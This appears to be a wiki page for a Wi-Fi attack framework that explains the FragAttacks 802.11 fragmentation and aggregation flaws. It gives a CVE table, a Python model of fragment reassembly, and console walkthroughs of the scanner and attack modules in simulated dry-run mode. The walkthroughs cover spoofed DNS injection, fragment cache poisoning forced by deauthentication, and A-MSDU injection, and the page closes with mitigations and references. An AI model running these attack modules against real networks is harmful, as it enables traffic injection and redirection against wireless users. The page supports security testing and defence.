FragAttacks
FragAttacks (Fragmentation and Aggregation Attacks) is a set of design flaws in the 802.11 Wi-Fi standard and implementation flaws in Wi-Fi products. Discovered by Mathy Vanhoef and disclosed in May 2021, the design flaws affect virtually all Wi-Fi devices regardless of the security protocol in use (WEP, WPA, WPA2, WPA3); the implementation flaws affect specific drivers and firmware. Both let an attacker within radio range inject or exfiltrate data frames in what should be a protected network.
| CVE | Name | Type | CVSS | Status |
|---|---|---|---|---|
| CVE-2020-24586 | Fragment cache attack: fragments not cleared from memory on (re)connect | Design flaw | n/a | Disclosed May 2021 |
| CVE-2020-24587 | Mixed key attack: fragments encrypted under different keys reassembled | Design flaw | n/a | Disclosed May 2021 |
| CVE-2020-24588 | Aggregation attack: non-SPP A-MSDU frames accepted (A-MSDU flag not authenticated) | Design flaw | n/a | Disclosed May 2021 |
| CVE-2020-26139 | Forwarding of EAPOL frames from not-yet-authenticated senders (APs) | Implementation | 5.3 | Disclosed May 2021 |
| CVE-2020-26140 | Plaintext data frames accepted in a protected network | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26141 | TKIP MIC of fragmented frames not verified | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26142 | Fragmented frames processed as full frames | Implementation | 5.3 | Disclosed May 2021 |
| CVE-2020-26143 | Fragmented plaintext data frames accepted in a protected network | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26144 | Plaintext A-MSDU starting with an RFC 1042 header with EtherType EAPOL accepted in a protected network | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26145 | Plaintext broadcast fragments accepted as full frames in a protected network | Implementation | 6.5 | Disclosed May 2021 |
| CVE-2020-26146 | Encrypted fragments with non-consecutive packet numbers reassembled | Implementation | 5.3 | Disclosed May 2021 |
| CVE-2020-26147 | Mixed encrypted/plaintext fragments reassembled | Implementation | 5.3 | Disclosed May 2021 |

Note on numbering: the module names below keep the tool's own CVE labels. In the official advisory the behaviours that fragattacks_cve_2020_26141 and fragattacks_cve_2020_26143 exercise (a stale fragment cache, and mixed plaintext/encrypted fragments) are CVE-2020-24586 and CVE-2020-26147; CVE-2020-26141 itself is the unverified TKIP MIC and CVE-2020-26143 the fragmented plaintext case.
| Module | Description |
|---|---|
| fragattacks/fragattacks_scanner | Passive scanner detecting FragAttacks-vulnerable APs by beacon flags |
| fragattacks/fragattacks_cve_2020_26140 | CVE-2020-26140 - Plaintext data injection in non-strict WPA2 APs |
| fragattacks/fragattacks_cve_2020_26141 | CVE-2020-26141 - Fragment cache abuse / non-contiguous fragment injection |
| fragattacks/fragattacks_cve_2020_26143 | CVE-2020-26143 - Mixed plaintext/encrypted fragment acceptance |
| wifi_lab/fragattacks | Full FragAttacks suite (wrapper for all modules) |
Large 802.11 frames can be fragmented into smaller MPDUs for transmission. Each fragment carries:
- A fragment number (0-15), the low 4 bits of the Sequence Control field
- A More Fragments bit in the Frame Control field (1 while more fragments follow, 0 on the last one)
- The same sequence number as the original frame, the high 12 bits of Sequence Control
The receiver groups fragments by transmitter address and sequence number, appends them in fragment-number order and delivers the frame once a fragment with More Fragments = 0 arrives. In an encrypted network every fragment of a frame is expected to be encrypted under the same key with consecutive packet numbers, and unfinished fragments should not outlive the session. FragAttacks showed that receivers commonly skip these checks, and that the standard itself neither requires the fragment cache to be cleared on (re)connect nor authenticates the A-MSDU flag in the QoS header.
Plaintext injection (CVE-2020-26140 for whole frames, CVE-2020-26143 for fragmented ones): some APs accept plaintext data frames during an active WPA2 session even though the network is protected. An attacker can inject plaintext frames, or plaintext fragments that the AP reassembles, and have the AP forward the result to a client inside the protected network.
Fragment cache attack (fragattacks_cve_2020_26141 module): unfinished fragments stay in the receiver's cache for several seconds (the module assumes 10 s) and, on vulnerable devices, survive a reconnect. The attacker injects a malicious first fragment, waits for the target to (re)transmit the second fragment of a frame carrying the same sequence number, and the AP reassembles the attacker's fragment with the victim's. The mixed variant (CVE-2020-26147) does the same with a plaintext first fragment and an encrypted second one.
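The reassembly rules above, and the ways the modules below abuse them, as an added example that is not wxf's code: a Python model of a receiver's fragment cache, where strict=False reproduces the vulnerable behaviour and strict=True applies the checks patched drivers perform. The station address, sequence numbers, packet numbers and payloads are constructed; decode_header shows where the More Fragments, Protected, sequence and fragment fields sit in the real Frame Control and Sequence Control fields.

```python
"""Receiver-side 802.11 fragment reassembly with the checks that FragAttacks
showed to be missing. Constructed model for this page, not wxf's own code."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

FC_MORE_FRAG = 1 << 10   # Frame Control bit 10: More Fragments
FC_PROTECTED = 1 << 14   # Frame Control bit 14: Protected Frame


def decode_header(frame_control: bytes, seq_control: bytes) -> Tuple[bool, bool, int, int]:
    """Little-endian Frame Control / Sequence Control ->
    (more_fragments, protected, sequence_number, fragment_number)."""
    fc, = struct.unpack("<H", frame_control)
    sc, = struct.unpack("<H", seq_control)
    return bool(fc & FC_MORE_FRAG), bool(fc & FC_PROTECTED), sc >> 4, sc & 0x0F


@dataclass(frozen=True)
class Fragment:
    src: str             # transmitter address (Addr2)
    seq: int             # 12-bit sequence number, shared by all fragments of one frame
    frag: int            # 4-bit fragment number, 0..15
    more: bool           # More Fragments bit
    protected: bool      # Protected Frame bit (CCMP/GCMP)
    pn: Optional[int]    # CCMP packet number; None for plaintext
    payload: bytes       # decrypted fragment body


class Reassembler:
    """strict=False keeps the pre-FragAttacks behaviour; strict=True adds the checks."""

    def __init__(self, strict: bool, protected_network: bool = True) -> None:
        self.strict = strict
        self.protected_network = protected_network
        self.cache: Dict[Tuple[str, int], List[Fragment]] = {}
        self.dropped: List[str] = []

    def on_connect(self) -> None:
        # CVE-2020-24586: a patched receiver flushes cached fragments on (re)connect.
        if self.strict:
            self.cache.clear()

    def _drop(self, reason: str) -> None:
        self.dropped.append(reason)
        return None

    def receive(self, f: Fragment) -> Optional[bytes]:
        # CVE-2020-26140/26143: no plaintext data frames, fragmented or not,
        # inside a protected network.
        if self.strict and self.protected_network and not f.protected:
            return self._drop("plaintext data frame in protected network")
        key = (f.src, f.seq)
        if f.frag == 0:
            self.cache[key] = [f]
        else:
            chain = self.cache.get(key)
            if chain is None or f.frag != chain[-1].frag + 1:
                return self._drop("fragment without predecessor")
            prev = chain[-1]
            if self.strict and f.protected != prev.protected:
                return self._drop("mixed plaintext/encrypted fragments")   # CVE-2020-26147
            if self.strict and f.protected and f.pn != prev.pn + 1:
                return self._drop("non-consecutive packet number")         # CVE-2020-26146
            chain.append(f)
        if f.more:
            return None                      # wait for the remaining fragments
        return b"".join(x.payload for x in self.cache.pop(key))


VICTIM = "02:00:00:00:00:01"   # constructed station address


def scenario_legitimate(strict: bool) -> Optional[bytes]:
    r = Reassembler(strict)
    r.receive(Fragment(VICTIM, 7, 0, True, True, 100, b"GET /index"))
    return r.receive(Fragment(VICTIM, 7, 1, False, True, 101, b".html"))


def scenario_cache_poisoning(strict: bool) -> Optional[bytes]:
    """Attacker's fragment 0 is still cached when the victim (re)connects and
    only its fragment 1, with the same sequence number, reaches the receiver."""
    r = Reassembler(strict)
    r.receive(Fragment(VICTIM, 7, 0, True, True, 500, b"EVIL"))
    r.on_connect()
    return r.receive(Fragment(VICTIM, 7, 1, False, True, 101, b".html"))


def scenario_mixed(strict: bool) -> Optional[bytes]:
    """Plaintext attacker fragment 0 followed by the victim's encrypted fragment 1."""
    r = Reassembler(strict)
    r.receive(Fragment(VICTIM, 7, 0, True, False, None, b"EVIL"))
    return r.receive(Fragment(VICTIM, 7, 1, False, True, 101, b".html"))


def scenario_pn_gap(strict: bool) -> Optional[bytes]:
    """Fragment 1 whose packet number does not follow fragment 0's."""
    r = Reassembler(strict)
    r.receive(Fragment(VICTIM, 7, 0, True, True, 100, b"GET /index"))
    return r.receive(Fragment(VICTIM, 7, 1, False, True, 250, b".html"))
```

With strict=False the poisoning, mixed and packet-number-gap scenarios all deliver b"EVIL.html" or the spliced frame to the upper layer; with strict=True each is dropped and the reason is recorded in Reassembler.dropped, while the legitimate two-fragment frame still reassembles to b"GET /index.html".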
```text
wxf > use generic/wifi_lab/fragattacks/fragattacks_scanner
wxf (FragAttacksScanner) > set INTERFACE wlan0mon
wxf (FragAttacksScanner) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacksScanner) > run
[*] Scanning AA:BB:CC:DD:EE:FF for FragAttacks vulnerabilities...
[*] Probe 1: checking 802.11n/ac/ax beacon flags (protected management frames)...
[*] Probe 2: checking TKIP fragment handling...
[*] Probe 3: checking A-MSDU subframe header spoofing...
[*] Probe 4: checking plaintext fragment injection acceptance...
Results:
  CVE-2020-26140: LIKELY VULNERABLE (no SPP A-MSDU support detected)
  CVE-2020-26141: LIKELY VULNERABLE (fragment cache timeout > 5s)
  CVE-2020-26143: CHECKING - requires active association test
  CVE-2020-26144: NOT TESTED (requires association)
  PMF enabled: no (makes CVE-2020-26139 easier)
[*] Recommend: test CVE-2020-26140 and CVE-2020-26141 with associated client
```
Impact: An attacker can inject arbitrary plaintext IP packets into a WPA2-protected network through APs that accept plaintext data frames from an associated client's address without requiring them to be encrypted.
Attack scenario: Inject a spoofed DNS response that points a hostname at an attacker-controlled IP, so the client connects to a malicious server. A client only accepts such a response if it matches an outstanding query (transaction ID and source port), so in practice the injection is raced against a lookup the attacker can trigger, or the published FragAttacks demo's approach is used: an injected ICMPv6 router advertisement that makes the client use the attacker's DNS server for all later lookups.
```text
wxf > use generic/wifi_lab/fragattacks/fragattacks_cve_2020_26140
wxf (FragAttacks-26140) > show options
Options:
  INTERFACE     wlan0mon      Monitor mode interface
  TARGET_BSSID  (required)    Target AP BSSID
  TARGET_IP     (required)    Target client IP address
  INJECT_TYPE   dns           Payload type (dns, arp, icmp, raw)
  DNS_NAME      example.com   DNS name to spoof (for dns type)
  DNS_IP        10.0.0.1      Spoofed DNS response IP
  SIMULATE      true          Dry-run
wxf (FragAttacks-26140) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks-26140) > set TARGET_IP 192.168.1.50
wxf (FragAttacks-26140) > set INJECT_TYPE dns
wxf (FragAttacks-26140) > set DNS_NAME updates.company.com
wxf (FragAttacks-26140) > set DNS_IP 10.10.10.10
wxf (FragAttacks-26140) > set SIMULATE true
wxf (FragAttacks-26140) > run
[SIMULATE] CVE-2020-26140: Plaintext fragment injection
[SIMULATE] Target AP: AA:BB:CC:DD:EE:FF
[SIMULATE] Target client: 192.168.1.50
[SIMULATE] Payload: DNS response for updates.company.com -> 10.10.10.10
[SIMULATE] Frame construction:
[SIMULATE]   Header: ToDS=1 FromDS=0 fragment=0 moreFrag=1 protected=0
[SIMULATE]   Addr1 (recv): AA:BB:CC:DD:EE:FF (AP)
[SIMULATE]   Addr2 (src): spoofed client MAC
[SIMULATE]   Addr3 (dest): 192.168.1.50
[SIMULATE]   Payload: UDP DNS response (spoofed)
[SIMULATE] Expected behavior on vulnerable AP:
[SIMULATE]   AP forwards plaintext frame to target client
[SIMULATE]   Client receives spoofed DNS response
[SIMULATE]   Client resolves updates.company.com to 10.10.10.10
[!] Set SIMULATE=false to inject live
[!] PREREQ: wlan0mon in monitor mode | Associated client at 192.168.1.50
[!] NOTE: Requires AP that does not enforce 802.11w (PMF)
```
Impact: By planting a malicious first fragment in the AP's reassembly cache, an attacker can have it spliced onto a legitimate fragment the victim later (re)transmits under the same sequence number. Depending on what the attacker puts in fragment 0 (for example an IP header addressed to the attacker), the result is either exfiltration of the victim's data or modification of the frame the victim receives.
```text
wxf > use generic/wifi_lab/fragattacks/fragattacks_cve_2020_26141
wxf (FragAttacks-26141) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks-26141) > set TARGET_IP 192.168.1.50
wxf (FragAttacks-26141) > set SIMULATE true
wxf (FragAttacks-26141) > run
[SIMULATE] CVE-2020-26141: Fragment cache poisoning
[SIMULATE] Step 1: Inject malicious first fragment (frag=0, moreFrag=1)
[SIMULATE]   Malicious fragment sent to AP cache under sequence number X
[SIMULATE]   Cache entry: seq=X frag=0 -> [malicious payload]
[SIMULATE] Step 2: Wait for legitimate fragment frag=1 from target
[SIMULATE]   Triggering retransmit via deauth... (simulated)
[SIMULATE] Step 3: AP reassembles: [malicious frag 0] + [legitimate frag 1]
[SIMULATE]   Combined frame forwarded to target with partial attacker control
[SIMULATE] Fragment cache timeout: 10s (window for step 2)
[SIMULATE] Expected outcome: partial payload modification of target traffic
[!] Set SIMULATE=false to run live
[!] This attack requires precise timing and a vulnerable AP
```
Impact: CVE-2020-26143 covers devices that accept fragmented plaintext data frames inside a protected network. The module's simulated output also exercises the related aggregation case: because the A-MSDU Present flag in the QoS header is not authenticated by CCMP/GCMP (CVE-2020-24588), an attacker can flip it on a legitimate encrypted frame so the receiver parses the decrypted payload as A-MSDU subframes, and some implementations additionally accept plaintext A-MSDUs that begin with an RFC 1042 header (CVE-2020-26144). In both cases attacker-controlled bytes are interpreted as a subframe of what the receiver believes is a legitimate frame.
```text
wxf > use generic/wifi_lab/fragattacks/fragattacks_cve_2020_26143
wxf (FragAttacks-26143) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks-26143) > set SIMULATE true
wxf (FragAttacks-26143) > run
[SIMULATE] CVE-2020-26143: Mixed plaintext/encrypted fragment
[SIMULATE] Constructing A-MSDU with spoofed plaintext RFC 1042 header
[SIMULATE]   Outer frame: encrypted CCMP (looks legitimate to driver)
[SIMULATE]   Inner subframe header: plaintext (spoofed destination + EtherType)
[SIMULATE]   Payload: attacker-controlled data injected into decrypted result
[SIMULATE] Vulnerable implementations: affected Linux mac80211, some Broadcom drivers
[SIMULATE] Test probes sent: 3 (CCMP with A-MSDU flag set)
[SIMULATE] Analysis: checking beacon IE for A-MSDU support flags
[!] Set SIMULATE=false to test live
[!] PREREQ: Associated STA on target AP network
```
The wrapper module runs the three single-CVE modules above in sequence against one BSSID and prints a combined verdict:
```text
wxf > use generic/wifi_lab/fragattacks
wxf (FragAttacks) > set INTERFACE wlan0mon
wxf (FragAttacks) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (FragAttacks) > set SIMULATE true
wxf (FragAttacks) > run
[SIMULATE] FragAttacks full suite
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] [1/3] CVE-2020-26140: plaintext injection test... LIKELY_VULNERABLE
[SIMULATE] [2/3] CVE-2020-26141: fragment cache test... LIKELY_VULNERABLE
[SIMULATE] [3/3] CVE-2020-26143: mixed fragment test... INCONCLUSIVE
[SIMULATE] Summary:
  CVE-2020-26140: LIKELY VULNERABLE
  CVE-2020-26141: LIKELY VULNERABLE
  CVE-2020-26143: INCONCLUSIVE (requires active association)
[!] Set SIMULATE=false to run live tests
```
Mitigations:
- Apply Wi-Fi driver and firmware updates from vendors; the fixes add the missing reassembly checks (no plaintext fragments in a protected network, no mixed plaintext/encrypted fragments, consecutive packet numbers) and clear the fragment cache on (re)connect
- Enable PMF (Protected Management Frames / 802.11w) where supported; it stops the deauthentication used to force retransmissions and reconnects, but it protects management frames only and does not by itself fix the data-frame fragmentation and aggregation flaws
- Use encrypted and authenticated higher-layer protocols over Wi-Fi (VPN, TLS, DNS over TLS/HTTPS) so that an injected plaintext frame cannot impersonate a server or a DNS answer
- Fragment cache attacks are prevented only by drivers that clear the cache on (re)connect; check the vendor advisory for the firmware or driver version that does so, since the timeout alone leaves a window of several seconds
References:
- Mathy Vanhoef, "Fragment and Forge: Breaking Wi-Fi Through Frame Aggregation and Fragmentation", USENIX Security 2021
- https://www.fragattacks.com (advisory, CVE list and the original test tool)
Related pages: KRACK | Wi-Fi Attacks | Configuration
Author: Andre Henrique (@mrhenrike) | Uniao Geek